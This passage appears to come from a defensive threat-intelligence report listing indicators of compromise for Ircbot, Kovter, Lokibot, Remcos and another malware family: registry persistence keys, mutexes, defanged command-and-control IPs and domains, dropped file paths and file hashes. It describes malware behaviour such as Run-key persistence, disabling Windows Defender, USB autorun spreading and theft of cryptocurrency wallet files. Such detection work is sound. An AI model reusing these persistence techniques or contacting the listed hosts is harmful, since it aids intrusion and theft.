<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | MuiUnattend | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE | MuiUnattend | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE | takeown | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | EhStorAuthn | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE | EhStorAuthn | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | ntoskrnl | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE | ntoskrnl | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | UserAccountControlSettings | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE | UserAccountControlSettings | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | pcaui | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE | pcaui | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | w32tm | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE | w32tm | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | eventvwr | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE | eventvwr | 1

Mutex | Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} | 19
\BaseNamedObjects\shell.{5B5347A7-9806-3802-3FD9-E106D6283088} | 2
\BaseNamedObjects\shell.{2DA495A3-711D-597E-268E-77F8D29EB324} | 1
\BaseNamedObjects\shell.{A90EDFAB-A502-430E-BDBC-2A277AABA37D} | 1
\BaseNamedObjects\shell.{5B932A48-D5E6-DC9D-1CCC-8C4A4EFDFAEB} | 1
\BaseNamedObjects\shell.{641070EF-FED1-8B40-20B1-757459DEA0E7} | 1
\BaseNamedObjects\shell.{85890FA8-4651-7F6B-96B4-C1A19F5B4623} | 1
\BaseNamedObjects\shell.{1095E0BC-41F3-CF2A-1232-3CB5F90C4677} | 1
\BaseNamedObjects\shell.{F1DB17FA-39DB-DA6E-6E05-AC596D3CADD5} | 1
\BaseNamedObjects\shell.{298948D1-70B9-FF20-23B0-FFCF5A6170CF} | 1
\BaseNamedObjects\shell.{6B756908-BAD6-5676-BEB4-1AF11E0335F1} | 1
\BaseNamedObjects\shell.{31C26804-8082-BCD2-AE9A-2E0E343C4A11} | 1

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
85[.]93[.]0[.]38 | 19
85[.]93[.]0[.]39 | 19
85[.]93[.]0[.]36 | 19
85[.]93[.]0[.]37 | 19
85[.]93[.]0[.]34 | 19
85[.]93[.]7[.]234 | 19
85[.]93[.]0[.]32 | 19
85[.]93[.]0[.]33 | 19
85[.]93[.]6[.]24 | 19
85[.]93[.]6[.]25 | 19
85[.]93[.]5[.]10 | 19
85[.]93[.]5[.]11 | 19
85[.]93[.]6[.]244 | 19
85[.]93[.]6[.]16 | 19
85[.]93[.]6[.]17 | 19
85[.]93[.]6[.]18 | 19
85[.]93[.]6[.]19 | 19
85[.]93[.]6[.]20 | 19
85[.]93[.]6[.]21 | 19
85[.]93[.]6[.]22 | 19
85[.]93[.]6[.]23 | 19
85[.]93[.]6[.]169 | 19
85[.]93[.]5[.]72 | 19
85[.]93[.]3[.]20 | 19
85[.]93[.]2[.]71 | 19
See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
ipinfo[.]io | 19

Files and/or directories created | Occurrences
%HOMEPATH%\NTUSER.DAT | 19
%HOMEPATH%\ntuser.dat.LOG1 | 19
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2} | 19
%System32%\Tasks\MuiUnattend | 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\MuiUnattend.lnk | 2
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\MuiUnattend.exe | 2
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\UserAccountControlSettings.exe | 1
%System32%\Tasks\UserAccountControlSettings | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\pcaui.lnk | 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\pcaui.exe | 1
%System32%\Tasks\pcaui | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\w32tm.lnk | 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\w32tm.exe | 1
%System32%\Tasks\w32tm | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\eventvwr.lnk | 1
%System32%\Tasks\eventvwr | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\wuapp.lnk | 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\wuapp.exe | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\bitsadmin.lnk | 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\bitsadmin.exe | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\certreq.lnk | 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\certreq.exe | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\mtstocom.lnk | 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\mtstocom.exe | 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\autochk.lnk | 1
See JSON for more IOCs
File Hashes
  • 12c882e47ae5e2ef9e3621b1d8a719458041ce6f1ed38b370c45c821a5e8c59b
  • 12ec0e3ccef67f877fefce823785ac7d7dbb0f85f8ad001bdf7fc6bfe46e3981
  • 18ca84623943190fa4ac1f756742b2ae30666d74acc7deee679b3a91bbd75e6f
  • 20b9ff24148baa96dbe1a0a7a48bbbeada81598988ee10605ebb21b139359e09
  • 24e2f47a00dba0b61b7ef2994f56318cc775c6fab40ad232598cebf0410b3da8
  • 30731c843ed73bf36620d943ddce0a0237d8694b7afb212541e2e91416096b2b
  • 33b70cc445e8fa02e56ea688be53f7c2993826388539adf7bf48fef3c45995a7
  • 341e0f811782bc5c95e195f6f4d88de2aece469919de8c2c7b61794f99f40d82
  • 4c3c95c99f5d583e2bbf8fb237e55aee3595dcdf24096dc0336190a067487e15
  • 4f5e962ece139e2478863ad05e2d92ed0f8d37c98616faa2338adb84efe99744
  • 5b54c5a4b56149231c5b2c0b9f0f40e226a4a198c9081068d245320f502fb439
  • 6179ede1ad0a80f932189cf1035fe8fe2329b4bde4ccdfcc1d3cbec15179d2b7
  • 692772293eb858cc1aa0bc9844448d3330a057992453e6a75e0a20e528ee4c6b
  • 734e3caad97e6edc7e62687d5a8a4628348ee24726938204779f3f5eb7a0f400
  • 80616c2ddd1a8c4e8be8c6053a905c9687e1f83336cc5661dca04c5ffb056afe
  • 825848fa43ac2ea280104225d930c7c85f33700c51528113295e75c8dc160aec
  • 9721c8e97b3ba15a00de9ab4dbcc0d3236253b5bb73f2b3e9d4f57c7ed3dd922
  • c381125d95a755659683f75fbf32b57546d7ef099e266ca1c00a305a1938736f
  • d9cf96f1f2dd702e618982028129009100e88e30c325775f98e77df4bf907af1
  • dc7f0f8206c6b155e04cca65f269b7f2a2238297e9782c4605ecd5cf5eb5d8a7
  • f378761bf7237c3355845ae18cc335b384e4ea7ba5f8ec1deea3fc59e3880050
  • fa754655007b7b726ede666f2838940ea89d3349dd9c1278a8c998e2eecda3e3
  • ff4ab281a403144dcd8fcf788e5421e739276389fcfe5cf31c708257d0474799

Coverage


Screenshots of Detection

AMP




ThreatGrid



Win.Malware.Ircbot-6984710-0


Indicators of Compromise


Registry Key | Value Name | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND | Start | 43
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | Microsoft Windows Manager | 43
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | Microsoft Windows Manager | 43

Mutex | Occurrences
b2 | 43
\BaseNamedObjects\b2 | 3

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
220[.]181[.]87[.]80 | 43
64[.]70[.]19[.]203 | 43
216[.]160[.]207[.]10 | 43
35[.]231[.]151[.]7 | 26
35[.]229[.]93[.]46 | 17
69[.]49[.]96[.]16 | 2
216[.]218[.]206[.]69 | 1

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
ageihehaioeoaiegj[.]su | 43
aefobfboabobfaoua[.]ru | 43
oeihefoeaboeubfuo[.]su | 43
eghoabeogbuaeofua[.]su | 43
abvainvienvaiebai[.]ru | 43
eghoabeogbuaeofua[.]ru | 43
iapghahpnpnapcipa[.]ru | 43
oeihefoeaboeubfuo[.]ws | 43
goiaegodbuebieibg[.]ru | 43
iapghahpnpnapcipa[.]ws | 43
ageihehaioeoaiegj[.]ru | 43
siiifibiiegiiciib[.]su | 43
oeihefoeaboeubfuo[.]ru | 43
aefobfboabobfaoua[.]su | 43
abvainvienvaiebai[.]su | 43
rohgoruhgsorhugih[.]ru | 43
rohgoruhgsorhugih[.]su | 43
siiifibiiegiiciib[.]ru | 43
oeabocbeogoaehgoi[.]ru | 43
rohgoruhgsorhugih[.]ws | 43
oeabocbeogoaehgoi[.]su | 43
iapghahpnpnapcipa[.]su | 43
goiaegodbuebieibg[.]su | 43
murphysisters[.]org[.]murphysisters[.]org | 2
www[.]murphysisters[.]org | 2

Files and/or directories created | Occurrences
\??\E:\autorun.inf | 43
\autorun.inf | 43
\??\E:\_ | 43
\.lnk | 43
\??\E:\DeviceConfigManager.vbs | 43
\??\E:\_\DeviceConfigManager.exe | 43
\DeviceConfigManager.vbs | 43
\_\DeviceConfigManager.exe | 43
\??\E:\DeviceConfigManager.bat | 43
\DeviceConfigManager.bat | 43
%SystemRoot%\M-5050720597279729037972350920 | 43
%SystemRoot%\M-5050720597279729037972350920\winmgr.exe | 43
\??\E:\.lnk | 41
%TEMP%\phqghumeay | 30
%TEMP%\edakubnfgu | 29
%TEMP%\rgjqmvnkyr | 26
%TEMP%\gwhroqkhwu | 25
%TEMP%\tubjrnmzyu.bat | 2
%TEMP%\eakjohgdtz.bat | 1
%TEMP%\roomnvjngg.bat | 1
%TEMP%\ynyfoqgvhz.bat | 1
%TEMP%\sypfjdusmt.bat | 1
%TEMP%\inwumejvuz.bat | 1
%TEMP%\euywrsbhrm.bat | 1
%TEMP%\jorljhwyxb.bat | 1
See JSON for more IOCs
File Hashes
  • 02fb71eb8559f95fd9d1bc2a31b119306c15a0921ab79101bc35e5ee1729e873
  • 0373f392e0cf0ec8a14fdf48a157cbbca1554960b0475724f45a80aae88932f3
  • 0851ddc919f0ea470c3c23e296b6a76b378678364d63a119f6ebab2779e75c00
  • 0b30c46cb7774dfa26d40809d4a665ba733364f3e9768314f5ac258c1ca2b213
  • 0e455cc4d487203ed86f96707ddcf09546c523b14238b003959d29db80db022a
  • 1538cc3c6f059ee7b734150f5e8eab97739c226119edd8b07c543ac77fc68ca5
  • 15647f00761bb8ff63128c4af1e1277e69b4f51c627779259833c6e2d474aea0
  • 168070acbb2cb5200981e8d0dbed8255bb389feef078162f1ba140dc3ea33553
  • 16eae34bfa90161d7948d421636687c4b2e7cd4bf66d33dc27da05370f1f1cdd
  • 1b0cff388754655704d76af041b56978edd261dd7c2bb8a64a7a79a808312e00
  • 1db1f2b0cf7c31206624f21c76587f97e41797d4b034e60577167c751a41c9d7
  • 1f9c1401a3d5279386e59811bd6a916fd555d0ce2701f955110cf548219f64f8
  • 1ffc4c395bbb6a3a25b17845a5bf7d897e7c9455c29a7d930607dddb1539f72e
  • 22e62621d215f605a6ad76325c08c8ade8a78a55411fad1e4081e0406069404d
  • 2a9836c84b839afa60b4fec08b0285404b065a596458237bdbadd9937b637ae2
  • 2d2d8936c9f938e60799545e538bc2397f1c2db0d5bf6a8e8afbb7cd561a81f5
  • 2d32b4679e6550adb81a453813e8a820f9d61133d946a32035a4ec3ab566e421
  • 2d5beaf3e2779270c8b6c3c9d288a64f53e4065104d6806438178f1283ed1c21
  • 2da6a2799761b83b1206e7dab4d590dfb689af837cf3ac66fa3e58bb8484ee21
  • 343054da58235802ed6126128c9b5d1017e32f0831ed5bc09748c0c3707d5433
  • 3451ccb4bdf160e6150d3f1f4ed55dc943544780edcef3098283e41502c8b4ab
  • 368ff13ab0807019f61b3ab0ee083c2ab701151582fd59e3b055be3f4e2c63ed
  • 36dc719c3e47172a121189c734406055df92e986d1e202769a2432191f028bf1
  • 386fdf3836ad5b3bf1588e6b40700abdc69eb793cfe7c6f36895da751944d2bb
  • 3a6e2efe8331037681da5ee01f8deb8aa7cd9960b21f5975aef7d876f7e82b86
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP



ThreatGrid



Win.Malware.Kovter-6985541-0


Indicators of Compromise


Registry Key | Value Name | Occurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE | DisableOSUpgrade | 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE | ReservationsAllowed | 25
<HKLM>\SOFTWARE\WOW6432NODE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | - | 25
<HKCU>\SOFTWARE\fc6a75be78 | - | 25
<HKLM>\SOFTWARE\WOW6432NODE\fc6a75be78 | - | 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate | - | 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUpgrade | - | 25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 | 0521341d | 25
<HKCU>\SOFTWARE\FC6A75BE78 | 0521341d | 25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 | b5e001e3 | 25
<HKCU>\SOFTWARE\FC6A75BE78 | b5e001e3 | 25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 | bca7705c | 25
<HKCU>\SOFTWARE\FC6A75BE78 | bca7705c | 25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 | 0905afc0 | 23
<HKCU>\SOFTWARE\FC6A75BE78 | 0905afc0 | 23
<HKLM>\SOFTWARE\WOW6432NODE\E75950E48E5A494D2B | - | 1
<HKLM>\SOFTWARE\WOW6432NODE\0oCEoq | - | 1
<HKLM>\SOFTWARE\WOW6432NODE\98LFDHTIH | FeWPlOewHO | 1
<HKLM>\SOFTWARE\WOW6432NODE\E75950E48E5A494D2B | 7CAC0591BC7764C7382 | 1
<HKLM>\SOFTWARE\WOW6432NODE\98LFDHTIH | p6gawa3 | 1
<HKCR>\RATHF\SHELL\OPEN\COMMAND | - | 1
<HKCR>\.XJJWQ8S | - | 1
<HKLM>\SOFTWARE\WOW6432NODE\0OCEOQ | YcaGv7s | 1
<HKLM>\SOFTWARE\WOW6432NODE\0OCEOQ | gG1npQtvrW | 1
<HKLM>\SOFTWARE\WOW6432NODE\5C8B173AEDDAD6407C3D | - | 1

Mutex | Occurrences
C59C87A31F74FB56 | 25
Global\42EDC1955FE17AD4 | 25
0D0D9BEBF5D08E7A | 25
1315B41013857E19 | 25
\BaseNamedObjects\BAD24FA07A7F6DD9 | 24
\BaseNamedObjects\863D9F083B3F4EDA | 24
\BaseNamedObjects\Global\EE662FBC96CBCB1A | 24

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
99[.]19[.]28[.]150 | 1
33[.]162[.]102[.]125 | 1
152[.]71[.]205[.]88 | 1
25[.]4[.]98[.]57 | 1
180[.]222[.]21[.]248 | 1
125[.]197[.]146[.]126 | 1
1[.]75[.]211[.]46 | 1
164[.]202[.]251[.]11 | 1
149[.]126[.]117[.]212 | 1
6[.]104[.]211[.]114 | 1
169[.]78[.]132[.]23 | 1
46[.]130[.]20[.]79 | 1
187[.]185[.]88[.]9 | 1
217[.]134[.]228[.]74 | 1
156[.]244[.]226[.]39 | 1
70[.]181[.]27[.]114 | 1
142[.]72[.]113[.]250 | 1
187[.]78[.]253[.]202 | 1
46[.]171[.]247[.]91 | 1
146[.]148[.]18[.]137 | 1
51[.]145[.]9[.]51 | 1
190[.]43[.]97[.]88 | 1
152[.]195[.]236[.]164 | 1
191[.]169[.]221[.]13 | 1
213[.]55[.]97[.]176 | 1
See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
cpanel[.]com | 1
etp[.]adilet[.]gov[.]kz | 1

Files and/or directories created | Occurrences
%LOCALAPPDATA%\epobuj | 1
%LOCALAPPDATA%\epobuj\0qIkSdDC.V0Eq5OI | 1
%LOCALAPPDATA%\lyza | 1
%LOCALAPPDATA%\lyza\CdxtVr.frbnvz | 1
%LOCALAPPDATA%\zamem | 1
%LOCALAPPDATA%\zamem\tOLe1R7o.SeYQX | 1
%LOCALAPPDATA%\jyde | 1
%LOCALAPPDATA%\jyde\OAws9tY.gXnWQL7wx | 1
%LOCALAPPDATA%\umove | 1
%LOCALAPPDATA%\umove\tX0S.dyCX7y | 1
%LOCALAPPDATA%\ojoc | 1
%LOCALAPPDATA%\ojoc\zurK74.xJjWq8s | 1
%LOCALAPPDATA%\pyrul | 1
%LOCALAPPDATA%\pyrul\Mo3j.DWTa0cV | 1
%LOCALAPPDATA%\bebet | 1
%LOCALAPPDATA%\bebet\iIKL9U.DGsvEB | 1
File Hashes
  • 00bd28d59cb4b7018516410c9664eec2eefe7adba447a37edb587d4829eb760d
  • 037385b8865ee894bf36cdce3b370265b7da03447b3b4e18dd72d114330e9942
  • 039c52e2bd728ba1ac902a0f4af7363d28aced0ba6f5622fbd0e118d959f59b2
  • 065d2473aa32a471228eba99fd58773ee61a634e4f2466b69f6f9c2c94ae56d3
  • 08e337c9f049aa7529aa727fcb8898d1eb2bf14d4b656af95d740e07d7ef9b67
  • 0adc56352600d4dd0a413986ffa45cbeaf04b973abdbd86c9b0c87a53440e294
  • 10f8c098454c63c90a986d037d571d055f5174a00e1f380931157a84ecdc2c01
  • 18b1f735465a3b6fba65570dbe125f10b8489587410a872973216ec853cb125b
  • 1e663349f267cef450ab939b3904bdd33e0809f9080235241929e09fb7b770ae
  • 270d791b5a9c8f7723563afffcb54932ee840920c7b68bed13d8c7aa689190ff
  • 2ca4a4be4d6975d74bb50303fa61c453ae539c6982f88ac38553b7a7ca512813
  • 3057b5a29b5ef78d36bce0c6c31ec2300f8c0ffdd67fc9f5efd7e3b1f00aa04a
  • 334afefc5c14d97cd3af6ab570691d73c23b2c257fd988502a08fec02fc6f7b7
  • 33a640afd9288415aff6de8ef74b85c1879784be2b73dd0900ab00d06dd519c0
  • 3680469ac286cfb7a9ef01f31b5703cfdb965550dba9170d0d60a93ab316cb9a
  • 36d13de18cddc5dcfb7bb8bb9e946c6c77a26be5e7098c1303e70db9f24511fd
  • 39af3ab5ef14b0dd3adc7b2bffa4a344bf19caf9b3d9e9d4c78afab321466f8d
  • 39c7f1118753de1bed52953ab491652c807970d42eff5f5366c3936a297f9220
  • 3b7be616a488f39465e822097aedc82aec3b05e730bcd22e1d5d57e64227439e
  • 3e653e5fbeda3f17ea2e35f2456769710d3210940f157fe25a18026943cef643
  • 3ed50e60a4117ffb607a4843f95df60f6cacbc29498f05371073ae06a562dfc3
  • 3fea545cce296bbbeb27176f2ce630493d3b680f789effa6d9dc26478d5f00cb
  • 449d58bad679912feee287ed8e17ce6221bc61432707e9f189490119bcb9a76d
  • 5263e898133a652e1e0ff1c94919d31c4c3da2bb1bf2fdbf876ba1dd18a01502
  • 56b0d6771543530d8a49ff3e8581f0a81330500ca9e6794a15f6876a394285f7
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP




ThreatGrid



Win.Malware.Lokibot-6987581-1


Indicators of Compromise


Registry Key | Value Name | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED | Hidden | 2
<HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASAPI32 | - | 2
<HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASMANCS | - | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 | EnableFileTracing | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 | EnableConsoleTracing | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 | FileTracingMask | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 | ConsoleTracingMask | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 | MaxFileSize | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32 | FileDirectory | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS | EnableFileTracing | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS | EnableConsoleTracing | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS | FileTracingMask | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS | ConsoleTracingMask | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS | MaxFileSize | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS | FileDirectory | 2
<HKCU>\SOFTWARE\Microsoft\Protected Storage System Provider\S-1-5-21-2580483871-590521980-3826313501-500 | - | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | internat.exe | 1
<HKCU>\Software\Microsoft\Windows Script Host\Settings | - | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | deaqsdegdd | 1
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\U6T0UXHWPB | - | 1

Mutex | Occurrences
3749282D282E1E80C56CAE5A | 19
- | 1
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-21-2580483871-590521980-3826313501-500 | 1
d19ab989-a35f-4710-83df-7b2db7efe7c5{846ee340-7039-11de-9d20-806e6f6e6963} | 1

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
87[.]251[.]88[.]30 | 5
87[.]251[.]88[.]27 | 4
93[.]158[.]134[.]38 | 2
47[.]254[.]177[.]155 | 2
87[.]251[.]88[.]28 | 2
87[.]251[.]88[.]19 | 2
69[.]195[.]146[.]130 | 1
104[.]16[.]154[.]36 | 1
104[.]16[.]155[.]36 | 1
192[.]185[.]129[.]109 | 1
185[.]29[.]9[.]246 | 1
5[.]253[.]62[.]214 | 1
149[.]129[.]242[.]147 | 1
104[.]31[.]83[.]247 | 1
37[.]120[.]146[.]124 | 1
37[.]120[.]146[.]122 | 1
84[.]234[.]96[.]91 | 1
145[.]239[.]202[.]109 | 1

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
doosantax[.]com | 4
bridgecornenterprises[.]com | 3
smtp[.]yandex[.]com | 2
whatismyipaddress[.]com | 2
unimasa[.]icu | 2
ip-api[.]com | 1
OK | 1
sas-agri[.]ml | 1
SIBARZZ[.]XYZ | 1
plutonav[.]ru | 1
bestbtcchange[.]com | 1
officialhillcoms[.]ga | 1
beatfile01[.]ml | 1
freecaps3[.]ml | 1
flmates[.]com | 1
www[.]dlamaqperu[.]com | 1
lronman4x4[.]com | 1
apollocapitalp[.]com | 1

Files and/or directories created | Occurrences
%ProgramData%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | 23
%LOCALAPPDATA%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | 23
%APPDATA%\D282E1 | 19
%APPDATA%\D282E1\1E80C5.lck | 19
%APPDATA%\pid.txt | 2
%APPDATA%\pidloc.txt | 2
%TEMP%\holdermail.txt | 2
%TEMP%\holderwb.txt | 2
%ProgramData%\freebl3.dll | 1
%ProgramData%\mozglue.dll | 1
%ProgramData%\msvcp140.dll | 1
%ProgramData%\nss3.dll | 1
%ProgramData%\softokn3.dll | 1
%ProgramData%\vcruntime140.dll | 1
%TEMP%\deaqsdegdd\deaqsdegdd.exe | 1
%TEMP%\deaqsdegdd\deaqsdegdd.vbs | 1
%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Soft\Authy | 1
%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets | 1
%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\ElectronCash | 1
%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\Electrum | 1
%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\ElectrumLTC | 1
%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\Ethereum | 1
%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\Exodus | 1
%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\JAXX | 1
%ProgramData%\4O1XVHRT01HDEJRSE1PVNWXU7\files\Wallets\MultiDoge | 1
See JSON for more IOCs
File Hashes
  • 21ea64cf87a724414eaaa6cc7a69a38cebef6b5507084f036b486adb3f805417
  • 25fa58e7d7821ca2c5cdb947422289eae7d3909efc9455a7a5ef4e476947f4ce
  • 30120ab8f904030dcd4748b4b5edc38f9437ee18d582ffd86c63882ef0afc1e5
  • 33527e13eaf4f1ad749a5d00e5f2f8c06e55503a492cdd3a2a01bebc79360aa3
  • 39bd8e2feb6ff6b4b8d25f5e8f9e2e413d7df9241c9effde6cf5c074b0360964
  • 425b00366b5e0bbcbecaa17a6f3767ce182d10cb54d14b8146d60795e0a91b4a
  • 45332fc059e1f72e4c9c27bd61e33b9af765299f3685bc1e33e31dae5206311b
  • 46773272beedf1cbcd61b41e399df8c437d8c915e3f942115eaa48c5a44af025
  • 4e59cb8c79d9dd7964e5319be30a91b8dee1744054e6e7c470717dab91c95905
  • 527eee4d3d2df6305545a95c33e17524a22464ba921f5091489bc776287e9082
  • 618c7974abfa637082c14b741cab9c859f0ea5ef9cb7517824d5c956886b9959
  • 6f86b9a80e340cae7b6ce7c70b06f7237c54019c37faa9dd888b57fe15568d6c
  • 72394394c1b0b5d02fe6e362fd07940a6d69551fa7fcacef03c0d82f41fc8fbc
  • 83ad9a9b79964ccec70ccf12c7e01c0ea6ea0dcf391dd2ac014d2381e1ba42f1
  • 90836122fddbc258f491d097e53e155258999cee41fe1550c78354aa3c8f2e04
  • 98a3e55133d7a23d343f2d690650e5579e485500447f0fff3e0e23f29c9fa86f
  • 9ad80c24445040b882abd94406f5bd389ab83b400ac4177687e653277788d7f3
  • a493e9a4662dabc9083cde701821e1df98e499dd9404f49dbedbe3f55fedd764
  • c6605ed53413e717e788b8f551455a1f9e94a313ebd00613fac0c63f7bfb920f
  • cce98d91043e66d5b85e536b8864e604d2b26566a8d875dda21e93f51efc6f71
  • dc9c4bb8db7e3b0d26dab3572df9ab97cd0218c14a17621104c2a6c095a61f40
  • dd33d5c467751e8f531bd557cc74f91619d43e3c8ebd1a516c339f33d3be9ac3
  • e25beccc8caa3518794a0ba5edbdc99916a66cee94fd55e25d9d34a23420bbe0

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella



Win.Malware.Remcos-6985941-1


Indicators of Compromise


Registry Key | Value Name | Occurrences
<HKCU>\Software\remcos_jpetmoenqu | - | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | srvs | 21
<HKCU>\SOFTWARE\REMCOS_JPETMOENQU | EXEpath | 18

Mutex | Occurrences
\BaseNamedObjects\remcos_jpetmoenqu | 25
Remcos_Mutex_Inj | 21
remcos_jpetmoenqu | 21

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
213[.]208[.]129[.]213 | 25

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
N/A | -

Files and/or directories created | Occurrences
%TEMP%\install.bat | 25
%HOMEPATH%\MdRes | 25
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\RmClient.url | 25
%APPDATA%\WindowsApp\logs.dat | 25
%APPDATA%\WindowsApp\srvs.exe | 25
%HOMEPATH%\MdRes\RmClient.vbs | 25
%HOMEPATH%\MdRes\klist.exe | 25
%HOMEPATH%\Start Menu\Programs\Startup\RmClient.url | 25
%APPDATA%\WindowsApp | 21
File Hashes
  • 2d0c8f189df656a4eb6e0352bd32fb21c3afbce9ea7c345550386ce0127c320a
  • 30f9c76cd44a579c337269351ab40daf575e5996769cf23ab9a0047663593809
  • 33baecfca9dcc0ad6c662a1df86a3ee2e97a9c042e6951145a1139674ee040ad
  • 430d466c1c81f8b680b5e8d57eb696a1c09efc0727009ee3412698bdbd77cede
  • 4ee4c01b513f59cef746c45b14b8211597937dfba27fb58b5e003fe97b7c87ce
  • 516aee696300bb4b56085134b659caa5800a89badc46fc6611864ff5e79ca872
  • 561a586d20b38ac2bac223d970186c02bacfdca09c96fe7d41125483b0a583d0
  • 6319c58313ab6b8172994320d5ae1c16dc3e0cd1462d10eddc1244dc2573b987
  • 68df7e2ac8625213080dad97fb015f78d0a7cbcf560e1d118879a7c949cf2eb4
